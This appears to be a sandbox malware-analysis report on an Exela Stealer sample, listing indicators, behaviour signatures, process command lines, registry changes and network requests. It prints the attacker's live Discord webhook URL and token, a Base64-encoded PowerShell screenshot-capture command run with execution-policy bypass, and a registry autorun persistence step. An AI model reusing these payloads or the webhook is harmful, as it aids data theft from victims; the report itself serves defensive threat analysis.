File name:

gift.exe

Full analysis: https://app.any.run/tasks/97343352-82c8-4613-a929-32b14ffd91af
Verdict: Malicious activity
Threats:

Exela Stealer is an infostealer malware written in Python. It is capable of collecting a wide range of sensitive information from compromised systems and exfiltrating it to attackers over Discord. It is frequently used to steal browser data, and obtain session files from various applications, including gaming platforms, social media platforms, and messaging apps.

Malware Trends Tracker     >>>
Analysis date: May 02, 2025, 19:57:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
stealer
python
exela
auto-reg
screenshot
discord
pyinstaller
susp-powershell
ims-api
generic
growtopia
discordgrabber
upx
rust
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

9E9FBCA740832A80B8213AA9C79E6FEA

SHA1:

4A6D2B59AB69585E079E3F2D9A55CACA3837FE7C

SHA256:

71AA720C8283C7704FD3F0F45E474B265FBDA7FDEA627B74B194C02381FCFEDC

SSDEEP:

98304:x1T2Q6kV4cUAOeW/OKeJqQKHH7bmY90GpJNSDaf87Yfd6ackYShtHfktEzafhOsr:cTmEkrYSqXONx6YWRUFYZg6+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 2040)

    • Steals credentials from Web Browsers

      • gift.exe (PID: 728)

    • ExelaStealer has been detected

      • gift.exe (PID: 728)

    • Actions looks like stealing of personal data

      • gift.exe (PID: 728)

    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 1228)
      • net.exe (PID: 5324)
      • net.exe (PID: 1628)
      • net.exe (PID: 2316)

    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 6564)
      • cmd.exe (PID: 1228)
      • net.exe (PID: 5056)

    • GROWTOPIA has been detected (YARA)

      • gift.exe (PID: 728)

    • DISCORDGRABBER has been detected (YARA)

      • gift.exe (PID: 728)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2560)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1012)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • The process drops C-runtime libraries

      • gift.exe (PID: 6620)
      • Exela.exe (PID: 5048)

    • Process drops python dynamic module

      • gift.exe (PID: 6620)
      • Exela.exe (PID: 5048)

    • Executable content was dropped or overwritten

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)
      • csc.exe (PID: 2552)

    • Starts a Microsoft application from unusual location

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)

    • Loads Python modules

      • gift.exe (PID: 728)
      • Exela.exe (PID: 6752)

    • Application launched itself

      • gift.exe (PID: 6620)
      • cmd.exe (PID: 5608)
      • cmd.exe (PID: 5260)
      • Exela.exe (PID: 5048)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 4040)

    • Starts CMD.EXE for commands execution

      • gift.exe (PID: 728)
      • cmd.exe (PID: 5608)
      • cmd.exe (PID: 5260)
      • Exela.exe (PID: 6752)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 6592)

    • Get information on the list of running processes

      • cmd.exe (PID: 4976)
      • cmd.exe (PID: 5048)
      • cmd.exe (PID: 6148)
      • gift.exe (PID: 728)
      • cmd.exe (PID: 3100)
      • cmd.exe (PID: 1228)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 5728)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6724)
      • cmd.exe (PID: 6240)
      • cmd.exe (PID: 5116)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 5260)
      • WMIC.exe (PID: 2108)
      • WMIC.exe (PID: 4272)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7052)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5596)

    • Executes JavaScript directly as a command

      • cmd.exe (PID: 4300)

    • Starts application with an unusual extension

      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 864)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6564)
      • cmd.exe (PID: 1012)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 1184)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 1228)

    • Checks for external IP

      • gift.exe (PID: 728)
      • svchost.exe (PID: 2196)

    • Uses WMIC.EXE to obtain local storage devices information

      • cmd.exe (PID: 1228)

    • Process uses IPCONFIG to discover network configuration

      • cmd.exe (PID: 1228)

    • Uses WMIC.EXE to obtain commands that are run when users log in

      • cmd.exe (PID: 1228)

    • Uses ROUTE.EXE to obtain the routing table information

      • cmd.exe (PID: 1228)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • gift.exe (PID: 728)

    • Process uses ARP to discover network configuration

      • cmd.exe (PID: 1228)

    • Uses QUSER.EXE to read information about current user sessions

      • query.exe (PID: 5124)

    • Multiple wallet extension IDs have been found

      • gift.exe (PID: 728)

    • Windows service management via SC.EXE

      • sc.exe (PID: 896)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1012)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 1012)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1012)

    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 1228)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 1228)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2552)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 2560)

  • INFO

    • The sample compiled with english language support

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • Checks supported languages

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • chcp.com (PID: 4988)
      • chcp.com (PID: 516)
      • Exela.exe (PID: 5048)
      • Exela.exe (PID: 6752)
      • cvtres.exe (PID: 6740)
      • csc.exe (PID: 2552)

    • Reads the computer name

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • Create files in a temporary directory

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)
      • csc.exe (PID: 2552)
      • cvtres.exe (PID: 6740)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 5728)
      • WMIC.exe (PID: 5508)
      • WMIC.exe (PID: 5260)
      • WMIC.exe (PID: 4436)
      • WMIC.exe (PID: 2088)
      • WMIC.exe (PID: 6516)
      • WMIC.exe (PID: 2108)
      • WMIC.exe (PID: 4272)

    • Creates files or folders in the user directory

      • gift.exe (PID: 728)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3140)

    • Auto-launch of the file from Registry key

      • reg.exe (PID: 2040)

    • Changes the display of characters in the console

      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 864)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 2904)

    • Checks operating system version

      • gift.exe (PID: 728)
      • Exela.exe (PID: 6752)

    • Manual execution by a user

      • Exela.exe (PID: 5048)

    • PyInstaller has been detected (YARA)

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)

    • Reads the time zone

      • net1.exe (PID: 1272)
      • net1.exe (PID: 1096)

    • Prints a route via ROUTE.EXE

      • ROUTE.EXE (PID: 1056)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • gift.exe (PID: 728)

    • Application based on Rust

      • gift.exe (PID: 728)

    • UPX packer has been detected

      • gift.exe (PID: 728)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 2552)

    • Checks proxy server information

      • slui.exe (PID: 4120)

    • Attempting to use instant messaging service

      • gift.exe (PID: 728)

    • Reads the software policy settings

      • slui.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(728) gift.exe
Discord-Webhook-Tokens (1)1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Discord-Info-Links
1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Get Webhook Infohttps://discord.com/api/webhooks/1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:02 19:38:30+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.42
CodeSize: 173568
InitializedDataSize: 95232
UninitializedDataSize: -
EntryPoint: 0xce20
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.19041.746
ProductVersionNumber: 10.0.19041.746
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Exela Services
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
InternalName: Exela.exe
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: Exela.exe
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.746
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
222
Monitored processes
97
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start gift.exe #EXELASTEALER gift.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs wmic.exe no specs wmic.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs reg.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs mshta.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs netsh.exe no specs systeminfo.exe no specs svchost.exe tiworker.exe no specs exela.exe hostname.exe no specs wmic.exe no specs net.exe no specs net1.exe no specs exela.exe no specs query.exe no specs quser.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs wmic.exe no specs tasklist.exe no specs ipconfig.exe no specs route.exe no specs cmd.exe no specs conhost.exe no specs arp.exe no specs netstat.exe no specs sc.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
516chcpC:\Windows\System32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
536arp -a C:\Windows\System32\ARP.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\iphlpapi.dll
728"C:\Users\admin\Desktop\gift.exe" C:\Users\admin\Desktop\gift.exe
gift.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Exela Services
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\gift.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
ims-api
(PID) Process(728) gift.exe
Discord-Webhook-Tokens (1)1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Discord-Info-Links
1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Get Webhook Infohttps://discord.com/api/webhooks/1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
864\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
864cmd.exe /c chcpC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
896sc query type= service state= all C:\Windows\System32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Service Control Manager Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1012C:\WINDOWS\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="C:\Windows\System32\cmd.exegift.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1056route print C:\Windows\System32\ROUTE.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Route Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\route.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
1096hostname C:\Windows\System32\HOSTNAME.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Hostname APP
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\hostname.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\napinsp.dll
1096C:\WINDOWS\system32\net1 user guest C:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ucrtbase.dll
Total events
31 268
Read events
31 262
Write events
6
Delete events
0

Modification events

(PID) Process:(2040) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Exela Update Service
Value:
C:\Users\admin\AppData\Local\ExelaUpdateService\Exela.exe
(PID) Process:(3140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1188) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31177628
(PID) Process:(1188) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
146
Suspicious files
37
Text files
40
Unknown types
0

Dropped files

PID
Process
Filename
Type
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_asyncio.pydexecutable
MD5:1B8CE772A230A5DA8CBDCCD8914080A5
SHA256:FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_decimal.pydexecutable
MD5:E9501519A447B13DCCA19E09140C9E84
SHA256:6B5FE2DEA13B84E40B0278D1702AA29E9E2091F9DC09B64BBFF5FD419A604C3C
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_cffi_backend.cp311-win_amd64.pydexecutable
MD5:0F0F1C4E1D043F212B00473A81C012A3
SHA256:FDA255664CBF627CB6A9CD327DAF4E3EB06F4F0707ED2615E86E2E99B422AD0B
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_bz2.pydexecutable
MD5:80C69A1D87F0C82D6C4268E5A8213B78
SHA256:307359F1B2552B60839385EB63D74CBFE75CD5EFDB4E7CD0BB7D296FA67D8A87
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:E8B9D74BFD1F6D1CC1D99B24F44DA796
SHA256:B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_socket.pydexecutable
MD5:04E7EB0B6861495233247AC5BB33A89A
SHA256:7EFE25284A4663DF9458603BF0988B0F47C7DCF56119E3E853E6BDA80831A383
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_multiprocessing.pydexecutable
MD5:849B4203C5F9092DB9022732D8247C97
SHA256:45BFBAB1D2373CF7A8AF19E5887579B8A306B3AD0C4F57E8F666339177F1F807
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\aiohttp\_websocket\mask.cp311-win_amd64.pydexecutable
MD5:E1D90780D680032FD97095A21B7A5F3D
SHA256:DAB785146241E8631EFD6975AF7EDC87335394880F359D134AF864101ABD1F35
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_uuid.pydexecutable
MD5:3377AE26C2987CFEE095DFF160F2C86C
SHA256:9534CB9C997A17F0004FB70116E0141BDD516373B37BBD526D91AD080DAA3A2B
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_ssl.pydexecutable
MD5:FD0F4AED22736098DC146936CBF0AD1D
SHA256:50404A6A3DE89497E9A1A03FF3DF65C6028125586DCED1A006D2ABB9009A9892
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
41
TCP/UDP connections
60
DNS requests
22
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
23.48.23.193:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
728
gift.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
GET
304
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
unknown
GET
200
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
unknown
1196
SIHClient.exe
GET
200
2.16.253.202:80
